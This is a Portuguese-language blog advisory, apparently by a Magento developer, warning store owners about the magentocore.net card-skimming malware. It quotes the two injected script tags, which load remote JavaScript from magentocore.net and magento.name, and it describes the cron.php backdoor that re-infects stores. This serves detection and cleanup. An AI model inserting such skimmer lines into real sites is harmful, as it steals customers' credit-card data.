Magento

Malware: magentocore.net [ALERTA]

No mês passado, uma infecção de milhares de lojas de Magento foi relatada devido a um malware de um site chamado magentocore.net. Isso é tudo o que você precisa saber e por que não é seguro instalar as coisas sem uma boa revisão.

Esteja ciente do malware magentocore.net

Verifique se o seguinte código foi adicionado ao campo de cabeçalho ou rodapé em seu backend do Magento:

<script type = "text / javascript" src="https://magentocore.net/mage/mage.js"> </script>  

Após a primeira onda de ataques e uma proibição do google em hackers de domínio magentocore.net mudou para magento.name

<script type = "text/ javascript" src="https://magento.name/mage/mage.js"> </script> 

Esses scripts não parecem prejudiciais à primeira vista, por causa do Magento no nome do domínio.

Essa linha de código solitária carrega e executa o código JavaScript nos navegadores de seus clientes e envia dados de cartão de crédito.

Minha loja foi hackeada … e agora?

Este malware específico é um demônio. Obviamente, apenas adicionou uma linha de código de inserção de JavaScript. O problema: se você removê-lo, pode estar lá depois de algum tempo novamente.

Como isso é possível? O malware magentocore.net altera seu cron.php e adiciona um backdoor em qualquer lugar/pasta de sua instalação Magento. Sua loja não é mais segura e identificar todos os problemas poderá levar muito tempo e ainda assim deixar alguma brecha de segurança.

Volte para a última versão válida do seu repositório.

Entre em contato para que eu possa te ajuda!

Post Recentes

CNPJ alfanumérico Magento 2: módulo grátis com máscara e validação

Módulo gratuito Roger_CnpjAlfanumerico que aplica máscara e validação do novo CNPJ alfanumérico no checkout e formulários do Magento 2 e…

4 dias atrás

CNPJ alfanumérico no WooCommerce: plugin grátis de máscara e validação

A partir de 06/07/2026 a Receita passa a emitir CNPJ alfanumérico. Conheça o plugin grátis que aplica máscara e validação…

4 dias atrás

Como remover um modulo do Magento 2

Para remover um módulo do Magento 2, siga os passos abaixo: 1. Desabilitar o módulo Primeiro, desabilite o módulo usando…

1 ano atrás

Criar um memorando de crédito (cancelar) invoice no Magento 2

Para cancelar 100% do pedido e criar um crédito para todos os itens através da API REST do Magento 2,…

2 anos atrás

Consultando no banco quantidade disponivel para Venda (estoque)

No Magento 2, a quantidade "reservada" na "Salable Quantity" é gerenciada principalmente pelos módulos MSI (Multi-Source Inventory). A "Salable Quantity"…

2 anos atrás

Admin do Magento 2 não acessa

Como corrigir o erro ao acessar o Admin do Magento 2. Mesmo após fazer o login, permanece na tela de…

2 anos atrás